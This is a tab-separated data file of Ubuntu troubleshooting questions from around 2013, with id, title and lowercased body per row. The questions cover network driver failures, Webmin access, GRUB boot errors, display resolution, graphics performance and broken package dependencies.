384605	upgrade apache 2.22 to a version that supports ecdhe	i 'm trying to setup my ubuntu 12.04 server installation to support perfect forward security . it seems that the default apache 2.2.22 build does not support ecdhe . any suggestions on a good way to upgrade to a compatible version of apache ?
384607	network cable unplugged message after motherboard change	solved ! ! ! jan 1 , 2014 . ( see last edit ) the motherboard on my win pc blew the pci-ex slot , so i had to swap it to my ubuntu box . everything works fine except the nic . i keep getting a cable unplugged message . the nic works fine in win xp ( dual boot setup ) so it is not hardware related . unbuntu 12.04 does not `` see the onboard nic marvell 88e8056 . i have downloaded and installed the sk98lin driver module from marvel . it shows up as a kernel module . but ubuntu keeps loading the old sky2 driver module . i have tried `` blacklisting '' the sky2 module but it keeps loading it . here are relevant terminal outputs : hans @ hans-ga-78lmt-s2p : ~ $ lspci -k | grep -a5 ethernet 02:00.0 ethernet controller : marvell technology group ltd. 88e8056 pci-e gigabit ethernet controller ( rev 20 ) subsystem : foxconn international , inc. device 0e0a kernel driver in use : sky2 kernel modules : sk98lin , sky2 hans @ hans-ga-78lmt-s2p : ~ $ ifconfig -a eth1 link encap : ethernet hwaddr 00:1c:25:51:24:43 inet6 addr : fe80 : :21c:25ff : fe51:2443/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:304 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:69952 ( 69.9 kb ) interrupt:19 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:168 errors:0 dropped:0 overruns:0 frame:0 tx packets:168 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:13344 ( 13.3 kb ) tx bytes:13344 ( 13.3 kb ) does anyone have a solution to the problem ? if so , please be specific and clear , please . i have been around computers for a long time ( remember punchcards ? ) but am a real noob at linux type systems . requested info : here is the content of the 70 persistent-net rules file : # this file was automatically generated by the /lib/udev/write_net_rules # program , run by the persistent-net-generator.rules rules file . # # you can modify it , as long as you keep each rule on a single # line , and change only the value of the name= key . # pci device 0x1969 : /sys/devices/pci0000:00/0000:00:06.0/0000:02:00.0 ( atl1c ) # subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 90:2b:34 : ad : c3:22 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x11ab : /sys/devices/pci0000:00/0000:00:07.0/0000:02:00.0 ( sky2 ) # subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:1c:25:51:24:43 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth1 '' # pci device 0x11ab : /sys/devices/pci0000:00/0000:00:07.0/0000:02:00.0 ( sk98lin ) subsystem== '' net '' , action== '' add '' , drivers== '' sk98lin '' , attr { address } == '' 00:1c:25:51:24:43 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x11ab : /sys/devices/pci0000:00/0000:00:07.0/0000:02:00.0 ( sky2 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:1c:25:51:24:43 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth1 '' extra output asked for : newly auto-generated 70-persistant-net.rules file after deleting the old : # this file was automatically generated by the /lib/udev/write_net_rules # program , run by the persistent-net-generator.rules rules file . # # you can modify it , as long as you keep each rule on a single # line , and change only the value of the name= key . # pci device 0x11ab : /sys/devices/pci0000:00/0000:00:07.0/0000:02:00.0 ( sky2 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:1c:25:51:24:43 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' lsmod & modinfo : hans @ hans-ga-78lmt-s2p : ~ $ lsmod | grep `` sk98\|sky '' sky2 59043 0 hans @ hans-ga-78lmt-s2p : ~ $ modinfo sky2 filename : /lib/modules/3.2.0-39-generic/kernel/drivers/net/ethernet/marvell/sky2.ko version : 1.30 license : gpl author : stephen hemminger < shemminger @ linux-foundation.org > description : marvell yukon 2 gigabit ethernet driver srcversion : 973de291f18f5911153fd7c alias : pci : v000011abd00004381sv*sd*bc*sc*i* alias : pci : v000011abd00004380sv*sd*bc*sc*i* alias : pci : v000011abd00004370sv*sd*bc*sc*i* alias : pci : v000011abd0000436dsv*sd*bc*sc*i* alias : pci : v000011abd0000436csv*sd*bc*sc*i* alias : pci : v000011abd0000436bsv*sd*bc*sc*i* alias : pci : v000011abd0000436asv*sd*bc*sc*i* alias : pci : v000011abd00004369sv*sd*bc*sc*i* alias : pci : v000011abd00004368sv*sd*bc*sc*i* alias : pci : v000011abd00004367sv*sd*bc*sc*i* alias : pci : v000011abd00004366sv*sd*bc*sc*i* alias : pci : v000011abd00004365sv*sd*bc*sc*i* alias : pci : v000011abd00004364sv*sd*bc*sc*i* alias : pci : v000011abd00004363sv*sd*bc*sc*i* alias : pci : v000011abd00004362sv*sd*bc*sc*i* alias : pci : v000011abd00004361sv*sd*bc*sc*i* alias : pci : v000011abd00004360sv*sd*bc*sc*i* alias : pci : v000011abd0000435asv*sd*bc*sc*i* alias : pci : v000011abd00004357sv*sd*bc*sc*i* alias : pci : v000011abd00004356sv*sd*bc*sc*i* alias : pci : v000011abd00004355sv*sd*bc*sc*i* alias : pci : v000011abd00004354sv*sd*bc*sc*i* alias : pci : v000011abd00004353sv*sd*bc*sc*i* alias : pci : v000011abd00004352sv*sd*bc*sc*i* alias : pci : v000011abd00004351sv*sd*bc*sc*i* alias : pci : v000011abd00004350sv*sd*bc*sc*i* alias : pci : v000011abd00004347sv*sd*bc*sc*i* alias : pci : v000011abd00004346sv*sd*bc*sc*i* alias : pci : v000011abd00004345sv*sd*bc*sc*i* alias : pci : v000011abd00004344sv*sd*bc*sc*i* alias : pci : v000011abd00004343sv*sd*bc*sc*i* alias : pci : v000011abd00004342sv*sd*bc*sc*i* alias : pci : v000011abd00004341sv*sd*bc*sc*i* alias : pci : v000011abd00004340sv*sd*bc*sc*i* alias : pci : v00001186d00004b03sv*sd*bc*sc*i* alias : pci : v00001186d00004b02sv*sd*bc*sc*i* alias : pci : v00001186d00004001sv*sd*bc*sc*i* alias : pci : v00001186d00004b00sv*sd*bc*sc*i* alias : pci : v00001148d00009e01sv*sd*bc*sc*i* alias : pci : v00001148d00009e00sv*sd*bc*sc*i* alias : pci : v00001148d00009000sv*sd*bc*sc*i* depends : intree : y vermagic : 3.2.0-39-generic smp mod_unload modversions parm : debug : debug level ( 0=none , ... ,16=all ) ( int ) parm : copybreak : receive copy threshold ( int ) parm : disable_msi : disable message signaled interrupt ( msi ) ( int ) parm : legacy_pme : legacy power management ( int ) hans @ hans-ga-78lmt-s2p : ~ $ modinfo sk98lin filename : /lib/modules/3.2.0-39-generic/kernel/drivers/net/ethernet/marvell/sk98lin.ko version : 10.93.3.3 license : gpl description : marvell/syskonnect yukon ethernet network driver author : mirko lindner < support @ marvell.com > srcversion : b6855c93810a36f7a9088b6 alias : pci : v000011abd00005005sv*sd*bc*sc*i* alias : pci : v000011abd00004382sv*sd*bc*sc*i* alias : pci : v000011abd00004381sv*sd*bc*sc*i* alias : pci : v000011abd00004380sv*sd*bc*sc*i* alias : pci : v000011abd00004370sv*sd*bc*sc*i* alias : pci : v000011abd0000436dsv*sd*bc*sc*i* alias : pci : v000011abd0000436csv*sd*bc*sc*i* alias : pci : v000011abd0000436bsv*sd*bc*sc*i* alias : pci : v000011abd00004369sv*sd*bc*sc*i* alias : pci : v000011abd00004368sv*sd*bc*sc*i* alias : pci : v000011abd00004367sv*sd*bc*sc*i* alias : pci : v000011abd00004366sv*sd*bc*sc*i* alias : pci : v000011abd00004365sv*sd*bc*sc*i* alias : pci : v000011abd00004364sv*sd*bc*sc*i* alias : pci : v000011abd00004363sv*sd*bc*sc*i* alias : pci : v000011abd00004362sv*sd*bc*sc*i* alias : pci : v000011abd0000435asv*sd*bc*sc*i* alias : pci : v000011abd00004357sv*sd*bc*sc*i* alias : pci : v000011abd00004356sv*sd*bc*sc*i* alias : pci : v000011abd00004355sv*sd*bc*sc*i* alias : pci : v000011abd00004354sv*sd*bc*sc*i* alias : pci : v000011abd00004353sv*sd*bc*sc*i* alias : pci : v000011abd00004352sv*sd*bc*sc*i* alias : pci : v000011abd00004350sv*sd*bc*sc*i* alias : pci : v000011abd00004347sv*sd*bc*sc*i* alias : pci : v000011abd00004346sv*sd*bc*sc*i* alias : pci : v000011abd00004345sv*sd*bc*sc*i* alias : pci : v000011abd00004344sv*sd*bc*sc*i* alias : pci : v000011abd00004343sv*sd*bc*sc*i* alias : pci : v000011abd00004342sv*sd*bc*sc*i* alias : pci : v000011abd00004341sv*sd*bc*sc*i* alias : pci : v000011abd00004340sv*sd*bc*sc*i* alias : pci : v000011abd00004320sv*sd*bc*sc*i* alias : pci : v00001186d00004c00sv*sd*bc*sc*i* alias : pci : v00001186d00004b03sv*sd*bc*sc*i* alias : pci : v00001186d00004b02sv*sd*bc*sc*i* alias : pci : v00001186d00004b01sv*sd*bc*sc*i* alias : pci : v00001186d00004001sv*sd*bc*sc*i* alias : pci : v00001148d00009e01sv*sd*bc*sc*i* alias : pci : v00001148d00009e00sv*sd*bc*sc*i* alias : pci : v00001148d00009000sv*sd*bc*sc*i* alias : pci : v00001148d00004320sv*sd*bc*sc*i* depends : vermagic : 3.2.0-39-generic smp mod_unload modversions parm : speed_a : array of charp parm : speed_b : array of charp parm : autoneg_a : array of charp parm : autoneg_b : array of charp parm : dupcap_a : array of charp parm : dupcap_b : array of charp parm : flowctrl_a : array of charp parm : flowctrl_b : array of charp parm : role_a : array of charp parm : role_b : array of charp parm : contype : array of charp parm : woltype : array of charp parm : intspersec : array of int parm : moderation : array of charp parm : moderationmask : array of charp parm : lowlatency : array of charp parm : txmoderation : array of int parm : msiirq : array of charp parm : rss : array of charp dec 04 , ok i got it this far : lspci -k | grep -a5 ethernet 02:00.0 ethernet controller : marvell technology group ltd. 88e8056 pci-e gigabit ethernet controller ( rev 20 ) subsystem : foxconn international , inc. device 0e0a kernel driver in use : sk98lin kernel modules : sk98lin , sky2 03:06.0 firewire ( ieee 1394 ) : texas instruments tsb43ab23 ieee-1394a-2000 controller ( phy/link ) subsystem : foxconn international , inc. device 0e0a hans @ hans-ga-78lmt-s2p : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr 00:1c:25:51:24:43 inet6 addr : fe80 : :21c:25ff : fe51:2443/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:105 errors:0 dropped:0 overruns:0 frame:0 tx packets:2 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:7491 ( 7.4 kb ) tx bytes:188 ( 188.0 b ) interrupt:42 memory : fdcfc000-0 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:104 errors:0 dropped:0 overruns:0 frame:0 tx packets:104 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:8224 ( 8.2 kb ) tx bytes:8224 ( 8.2 kb ) hans @ hans-ga-78lmt-s2p : ~ $ but ubuntu still reports the cable unplugged . any suggestions ? hans dec 6 . anders : - here is the lsmod output : - hans @ hans-ga-78lmt-s2p : ~ $ lsmod -a usage : lsmod hans @ hans-ga-78lmt-s2p : ~ $ lsmod module size used by snd_hda_codec_realtek 224173 1 k8temp 13057 0 snd_hda_intel 33719 3 snd_hda_codec 127706 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 17764 1 snd_hda_codec snd_pcm 97275 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61929 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq psmouse 97485 0 sp5100_tco 13791 0 snd 79041 15 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device i2c_piix4 13301 0 serio_raw 13211 0 edac_core 53746 0 edac_mce_amd 23709 0 soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm radeon 808704 2 bnep 18281 2 rfcomm 47604 0 bluetooth 180153 10 bnep , rfcomm parport_pc 32866 1 ppdev 17113 0 ttm 76949 1 radeon drm_kms_helper 46978 1 radeon drm 241971 4 radeon , ttm , drm_kms_helper i2c_algo_bit 13423 1 radeon mac_hid 13253 0 shpchp 37201 0 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp usbhid 47238 0 firewire_ohci 41000 0 hid 99636 1 usbhid pata_atiixp 13204 0 firewire_core 63600 1 firewire_ohci crc_itu_t 12707 1 firewire_core floppy 70207 0 sk98lin 187175 1 usb_storage 49243 0 hans @ hans-ga-78lmt-s2p : ~ $ i can only see one ethernet driver loaded . ( sk98lin ) could it be the network manager gui ? hans dec 6 edit 2 have tried a number of things , static ip - loads it but does not connect to router eliminated possible ip conflict on routers - still no results . i has to be ubuntu , here is the working windows ipconfig . microsoft windows xp [ version 5.1.2600 ] ( c ) copyright 1985-2001 microsoft corp. c : \documents and settings\hans > ipconfig windows ip configuration ethernet adapter local area connection 2 : connection-specific dns suffix . : royaume.com ip address . . . . . . . . . . . . : 192.168.0.106 subnet mask . . . . . . . . . . . : 255.255.255.0 default gateway . . . . . . . . . : 192.168.0.1 c : \documents and settings\hans > ipconfig/all windows ip configuration host name . . . . . . . . . . . . : server_1 primary dns suffix . . . . . . . : node type . . . . . . . . . . . . : unknown ip routing enabled . . . . . . . . : no wins proxy enabled . . . . . . . . : no dns suffix search list . . . . . . : royaume.com ethernet adapter local area connection 2 : connection-specific dns suffix . : royaume.com description . . . . . . . . . . . : marvell yukon 88e8056 pci-e gigabit ethernet controller physical address . . . . . . . . . : 00-1c-25-51-24-43 dhcp enabled . . . . . . . . . . . : yes autoconfiguration enabled . . . . : yes ip address . . . . . . . . . . . . : 192.168.0.106 subnet mask . . . . . . . . . . . : 255.255.255.0 default gateway . . . . . . . . . : 192.168.0.1 dhcp server . . . . . . . . . . . : 192.168.0.1 dns servers . . . . . . . . . . . : 192.168.0.1 lease obtained . . . . . . . . . . : friday , december 06 , 2013 1:18:08 pm lease expires . . . . . . . . . . : saturday , december 07 , 2013 1:18:08 pm c : \documents and settings\hans > so if anyone has an idea ? please i 'm now well beyond my knowledge of this os . thanks hans here is the dec 7 output : hans @ hans-ga-78lmt-s2p : ~ $ sudo cat ../../etc/networkmanager/system-connections/* [ 802-3-ethernet ] duplex=full mac-address=00:1c:25:51:24:43 [ connection ] id=wired connection 1 uuid=d10d591a-43b6-4692-84e3-6bd53c5f4f41 type=802-3-ethernet [ ipv6 ] method=auto [ ipv4 ] method=auto hans @ hans-ga-78lmt-s2p : ~ $ cat ../../etc/network/interfaces auto eth0 iface eth0 inet static address 192.168.0.106 netmask 255.255.255.0 network 192.168.0.1 auto lo iface lo inet loopback hans @ hans-ga-78lmt-s2p : ~ $ hans issue solved ! ! ! ! hi all who were following this . i have solved the problem . i still do n't know what caused the problem but i have solved it by installing a new pci network card ( startech.com part # st1000bt32 . i disabled the onboard ethernet and plugged in this card . started up linux and `` bing '' a network connection . so thanks all who took the time to try to help , especially anders . hope this helps some others . happy new year . hans
384609	how to access webmin ?	i 've tried loading it on a page with different browsers and it wo n't load . i 've also tried starting it from com with /etc/webmin/start and it says failed to bind to port 10000 : address already in use could not listen on any this is also the only thing running on 10000 : tcp 0 0 0.0.0.0:10000 0.0.0.0 : * listen 3783/perl maybe a firewall issue ? how to fix it ?
384610	lubuntu 13 . 10 on asus eee pc - speaker problem	lubuntu 13.10 running on a netbook . i made a video of it . http : //www.youtube.com/watch ? v=ritfm6co9pm it 's running from a bootable flash drive to test it . speakers do n't work properly ; they make noise at 100 % volume level . before i install it , i need to know this can be solved ... any ideas ?
384611	browser freezes ( chromium and firefox )	somtimes my browser just freezes . already happened in chromium and firefox . it keeps working , since i can click on any link or use any keyboard shorcut and it opens new tabs and etc. , but i ca n't see it because it keeps stuck at the same screen . i can use alt+tab to open other programs . the browser screen does n't fade to black ( fade to black screen happens when system knows that programa is frozen ) . sometimes i resize the browser window and it comes back , but sometimes i have to force-quit it . could this be something related to nvidia graphic card ? i think it is not because it only happens with the browser .
384615	failed to fetch error when updating from 12.10 to 13.04	i have looked on many other questions and they all seem to be different from mine . i only have one error message when using sudo apt-get update , and it 's with updating the dist . w : failed to fetch http : //archive.canonical.com/dists/precise/release unable to find expected entry 'parner/source/sources ' in release file ( wrong sources.list entry or malformed file )
384621	change default bootloader to grub2	i had changed the bootloader to windows using easybcd . i had added grub2 as one of the boot options via this . unfortunately , when i tried to boot to grub2 i got the error '' nst/autoneogrub0.mbr is missing '' i changed the bootloader back , and removed easybcd . i then tried booting into ubuntu via live cd . i got a black screen . in a last ditch attempt , i tried using the boot repair cd , but that did n't work either . i am running windows 8.1 with ubuntu partitioned . how can i change the default bootloader to grub2 ?
384622	my system restarts after sleep/suspend	i just replaced windows 7 on my old machine ( 4 years ) with ubuntu 13.10 and the installation seemed smooth . however , when i do a wake-up call from suspend/sleep , the laptop restarts when i shutdown , it shuts down pretty fast . despite being happy of this , it concerned me and i restarted . turns out that there was an `` report error '' dialog box just like when it restarted from suspend/sleep . any suggestions ? any installation issue ? driver issue ?
384624	ca n't change webmin port ?	i 'm using the code sudo nano -w /etc/webmin/miniserv.conf to change webmin 's port in putty but it 's saying command not found . any suggestions ? : ~ # sudo nano -w /etc/webmin/miniserv.conf sudo : nano : command not found
384625	screen not refreshing when second display has full-screen application running	i have several external displays that i connect to my laptop ( 800x600 , 1660x1050 ) . when i put an application , such as totem , pure data or eye of gnome , full screen ( via f11 ) in the external display , the display on the primary screen ( my laptop ) starts to act weird and not refresh properly . examples : is there a way to fix this ? additional information from running dmesg 9515.023073 ] [ drm : i915_hangcheck_elapsed ] *error* stuck on blitter ring [ 9515.023075 ] [ drm ] capturing error event ; look for more information in /sys/kernel/debug/dri/0/i915_error_state [ 9515.047148 ] [ drm : i915_set_reset_status ] *error* blitter ring hung inside bo ( 0x7f585000 ctx 0 ) at 0x7f585004 i have a dell xps 13 developer edition running ubuntu 13.10 with intel® ivybridge mobile graphics and intel® core™ i7-3537u cpu @ 2.00ghz × 4 processors .
384626	process scheduling with usb	in linux kernel development how to come to know which processes use the usb and which one do not ? any help would be appreciated
384627	can not delete .trash1000 folder on usb drive	i have my pendrive working fine if i use it on windows xp , but it contains some files ( 1.1gb ) , including .trash1000 folder , and it is not allowing me to delete that . i tried the following , but none of it worked : sudo rm -rf /path/to/folder/.trash-1000 su root cd /media/ < username > /pendrive/ rm -rf .trash-1000 moving it to trash & then deleting it somewhere i read that i have to set executable permissions before deleting . i think i did that , but it still did not work . the usb drive works fine with its remaining 6 gb of space on ubuntu and windows xp , but the folder .trash1000 can not be deleted . related issue i have copied some sql files into the database folder on my usb drive . it does n't show up on ubuntu , yet it does show up on windows xp and windows 7 .
384629	gcc could n't locate slab.h in ubuntu 12.04 ?	please correct me if i 'm missing something here . thanks for your inputs . header included in code : # include < linux/slab.h > code snippet from my file that 's asking for memory allocation using `` kmalloc ( ) '' : /* * initialize memory . */ char* fs_ptr ; fs_ptr = kmalloc ( ( sizeof ( char ) * 20 ) , gfp_user ) ; if ( ! fs_ptr ) printf ( `` error allocating space in memory.\n '' ) ; } compile error : $ make gcc -g -wall `pkg-config fuse -- cflags` -c fs.c fs.c:43:24 : fatal error : linux/slab.h : no such file or directory compilation terminated . ubuntu version info . : $ uname -a linux ubuntu 3.8.0-33-generic # 48~precise1-ubuntu smp thu oct 24 16:28:06 utc 2013 x86_64 x86_64 x86_64 gnu/linux location of header file , searching via 'locate ' : $ locate slab.h /usr/src/linux-headers-3.8.0-29/include/linux/slab.h /usr/src/linux-headers-3.8.0-29-generic/include/linux/slab.h /usr/src/linux-headers-3.8.0-31/include/linux/slab.h /usr/src/linux-headers-3.8.0-31-generic/include/linux/slab.h /usr/src/linux-headers-3.8.0-32/include/linux/slab.h /usr/src/linux-headers-3.8.0-32-generic/include/linux/slab.h /usr/src/linux-headers-3.8.0-33/include/linux/slab.h /usr/src/linux-headers-3.8.0-33-generic/include/linux/slab.h
384635	how can i build and install a qt project/.pro ?	i would like to install sqlite database browser from sourceforge . i downloaded the file and unzipped it with tar -xvf sqlitebrowser_200_b1_src.tar.gz now it 's a directory in my downloads with this structure : | -- trunk | -- sqlitebrowser | -- sqlite_source | -- images | .. lots of files from here how do i install the application ?
384636	ubuntu 13.10 can not show all resolutions of my monitor	i have a problem about resolutions . i just open my computer and when it is opening ubuntu gave and error message something like `` errors have been founded .. for manual recovery s to skip continue to wait ... '' something like this . so i just press i to ignore that and it opened successfully . but i realized that the resolution has an error . when i open system settings > displays it told me that the monitor is unknown . and the highest resolution that i can see is 1024x768 . i checked for broken packages , enter a code to terminal like sudo apt-get install mesa-utils and tried more stuffs to fix it but i just could not . here is my latest screen shot which explains everything , i hope . so , summary is ubuntu 13.10 can not recognize what monitor i am using . so it ca n't show every resolutions . how to fix it , please ?
384638	computer boot page choose ubuntu or windows	i am having a problem loading ubuntu 13.04 right after i select it from the dual os selection page . once , i select ubuntu to run as an os ... . i receive the a message which includes : file : winboot\wubildr.mbr status : 0xc000007b can you help me ? ? ? ? thnx .
384639	installing ubuntu i have problem with unallocated space	i had 2 drives ( c=100gb , e=150gb ) in my windows 7 , now i want to install ubuntu as dual boot . for that i shrink my one of the drive and made some space ( 40 gb ) to install ubuntu as unallocated space , but during ubuntu installation its not showing that unallocated space it is showing total free space 250gb.how can i install ubuntu in separate partition
384642	unable to access webmin ?	i 'm unable to access webmin via web or com . i 've changed the port , and i 'm thinking it 's the firewall that is closing it . what code is needed to change and give access to the port ?
384647	lost settings menu and unity lenses after uninstalling gnome 3	i installed gnome 3 in ubuntu 13.10- i later decided to remove it . now everything has gone . when i right click the desktop i ca n't access the settings and all the unity lenses are missing apart from the social and network messages . so i ca n't access any programs from the unity launcher only what i have pinned to the side bar . in the terminal i tried apt-get install gnome-control-center but i get the following message the following packages have unmet dependencies . gnome-control-center : depends : gnome-control-center-data ( < 1:3.7 ) but 1:3.8.3-0ubuntu1~raring2 is to be installed e : unable to correct problems , you have held broken packages . i guess when i removed gnome 3 it broke some packages and i am not sure how to get them back . i installed gnome 3 from the ppa sudo apt-get install ubuntu-desktop outputs some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . ubuntu-desktop : depends : gnome-control-center but it is not going to be installed recommends : gnome-control-center-unity but it is not going to be installed recommends : xul-ext-webaccounts but it is not going to be installed e : unable to correct problems , you have held broken packages . -f install outputs 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . sudo apt-get check outputs reading package lists ... done building dependency tree reading state information ... done sudo apt-get install aptitude & & sudo aptitude -fy install ubuntu-desktop it says 6 packages were installed but they were not installed . the following new packages will be installed : gnome-control-center { ab } gnome-control-center-signon { a } gnome-control-center-unity ubuntu-desktop webaccounts-extension-common { a } xul-ext-webaccounts 0 packages upgraded , 6 newly installed , 0 to remove and 0 not upgraded . need to get 655 kb/729 kb of archives . after unpacking 4,667 kb will be used . the following packages have unmet dependencies : gnome-control-center : depends : gnome-control-center-data ( < 1:3.7 ) but 1:3.8.3-0ubuntu1~raring2 is installed . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) gnome-control-center [ not installed ] 2 ) gnome-control-center-signon [ not installed ] 3 ) gnome-control-center-unity [ not installed ] 4 ) ubuntu-desktop [ not installed ] 5 ) webaccounts-extension-common [ not installed ] 6 ) xul-ext-webaccounts [ not installed ] leave the following dependencies unresolved : 7 ) ubuntu-desktop recommends gnome-control-center-unity no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used .
384648	can i upload webplusx6 ?	i am a new ubuntu user . can i upload webplusx6 to ubuntu ? it 's a program used to create websites that is offered by serif .
384650	how to install h.264 decoder ?	i tried playing videos in movie player but only the audio could be heard . i tried playing the video with dragon player but here also only the audio could be heard . a message box appeared showing the following message : python ( v2.7 ) requires to install plugins to play media files of the following type : h.264 decoder i tried installing the plugin but it could n't be installed . it is n't available in the software center too . how can i get this plugin ?
384654	please guide me , to configure qt on lubuntu 13.10	i had downloaded lubuntu ( version of ubuntu ) 13.10.. downloaded gccc ( 4.8.2 ) /qt5..qt . installed as it was .run file . but could not compile a single app on it , even a simplest one ( though qt has its own sdk ) . qt was asking default compiler . it was asking for ppa ( personal package archive ) . downloaded gcc-4.8-doc_4.8.2-5ubuntu4~ppa2_all.deb , a ppa to install , while i run ppa : < gcc*.deb > /ppa on terminal , then get error . please any , provide me guidance to proceed
384657	an error occured please run the package manager from the right click menu	i am facing some issue my ubuntu bar was showing some triangle with ! sign and i tried to find out some solution and by mistake i deleted /etc/apt/sources.list i tried to search for some solution but got nothing now sign look like as shown in the link image . could anyone help me out to find the solution i am using ubuntu 13.10 . current bar : - http : //screencloud.net/v/g7lr could any one help me thanx in advance and now even my update manager is not working i think i need to reinstall the ubuntu please suggest if any solution i am having lots of configuration on my system . i get the following when running sudo apt get update err ppa.launchpad.net saucy/main sources 404 not found err ppa.launchpad.net saucy/main i386 packages 404 not found err ppa.launchpad.net saucy/main i386 packages 404 not found ign ppa.launchpad.net saucy/main translation-en_in ign ppa.launchpad.net saucy/main translation-en fetched 748 kb in 3min 14s ( 3,851 b/s ) w : failed to fetch packages.medibuntu.org/dists/saucy/inrelease w : failed to fetch packages.medibuntu.org/dists/saucy/release.gpg could not resolve 'packages.medibuntu.org ' w : failed to fetch extras.ubuntu.com/ubuntu/dists/sauscy/main/source/sources 404 not found w : failed to fetch ppa.launchpad.net/webupd8team/unstable/ubuntu/dists/saucy/main/âś 404 not found w : failed to fetch ppa.launchpad.net/webupd8team/unstable/ubuntu/dists/saucy/main/âś 404 not found
384663	error : no such device grub rescue ( error appears when booting from usb too )	i know this error appears many times on the web , and the advice is to boot from a live cd/usb and re-install the grub from the terminal . this is not a solution for me since i am getting the error when booting from usb . from the bios i have set the boot device priority to 'removable device ' . not sure if i should set usb to 1st hard disk . error : no such device : 8d0615a7-b8ff-499f-88e0-99b323b9d524 . grub rescue > pc : asus eeepc 4g . trying to install lubuntu 13.04
384664	setting up hotspot on pc using lan card	can i make my pc as wifi router.i mean how i can use wired internet as wifi.in my pc i have broadband connection and ralink wireless lan card ... plz tell what to do
384665	mount ftp so it will be possible to execute shell commands	i have backup storage on ftp server . i want to mount ftp server ( may be with a help of curlftpfs ) ands not only read/write , but also execute shell commands there , too . is it possible ?
384666	13-10-black-borders-black-terminal	i have the same problem as 13.10 - black borders , black terminal . found that i was able to use xterm , however the suggestions i found did not solve this problem . upgrade till ubuntu 13.10 64bit on nuc intel® core™ i5-4250u cpu @ 1.30ghz × 4 graphics intel® haswell mobile
384669	games on xubuntu	i installed xubuntu lately with my amd mobility radeon hd 4225/4250 driver . sadly , gta sa has been very laggy for me and playing cod 4 is a nightmare . i have 2 question is there a way to make them less laggy on the open source driver ? or theres really nothing i can do . should i go back to dual booting with windows even if i hate windows but i want to play games . thank you for your replies
384673	how to get my amd graphics to work for games on xubuntu 13.10	how do i get my amd graphics to work for games to be less laggy on xubuntu 13.10 . for gta sa and cod 4 graphics : amd mobility radeon hd 4225/4250 driver chipset : amd m880g chipset pc/specs : hp g62-378ca notebook pc product specifications | hp速 support
384676	how to connect laptop to xbox live via ethernet using wired network ?	i 'm trying to connect my laptop to xbox live via ethernet , i have tried the share to other computers method and set ipv6 to ignore and also sudo killall dnsmasq in terminal , but when i do this it says process not found , does anyone have the answer to this ?
384677	how do i install and enable pdo_mysql and gd extensions for php5 ?	when trying to install webtrees i get the following output : checking server configuration php extension `` pdo_mysql '' is disabled . you can not install webtrees until this is enabled . please ask your server 's administrator to enable it . php extension `` gd '' is disabled . without it , the following features will not work : creating thumbnails of images . please ask your server's administrator to enable it . how do i install and enable the pdo_mysql and gd extensions ?
384682	install full ubuntu 12.04 on usb and boot on mac	i will be very specific because i have tried asking this question multiple times and people get confused . i would like to install full ubuntu 12.04 onto a flashdrive and be able to boot from the flashdrive on a mac . i am able to make a usb install disk and boot from my mac with no problem . i am able to make a full install of ubuntu on a usb drive and boot from a non-mac computer with no problem . i would like to put a full install of ubuntu on a usb drive ( not just the install disk with try ubuntu , the full thing ) and be able to boot it on a mac . i have tried this by running the installation and creating an ext4 partition at / and a swap partition . it boots up great on a windows computer but not on my mac . i know mac can book ubuntu on usb because it boots the usb install disk fine and i can use ubuntu in the try ubuntu option . one idea i had was to take my bootable ubuntu usb drive ( which is the try ubuntu install one ) , since i know it boots and somehow turn it into a full ubuntu install . any ideas would be greatly appreciated .
384688	absurdly long ubuntu install.. advice on this please	why is the ubuntu install taking an absurdly long time ? i started the install yesterday around 4pm.. it is noon now.. and still running.. last entry in code `` dec 1 12:17:01 ubuntu cron [ 7317 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) `` and it is simply repeating this now ... .
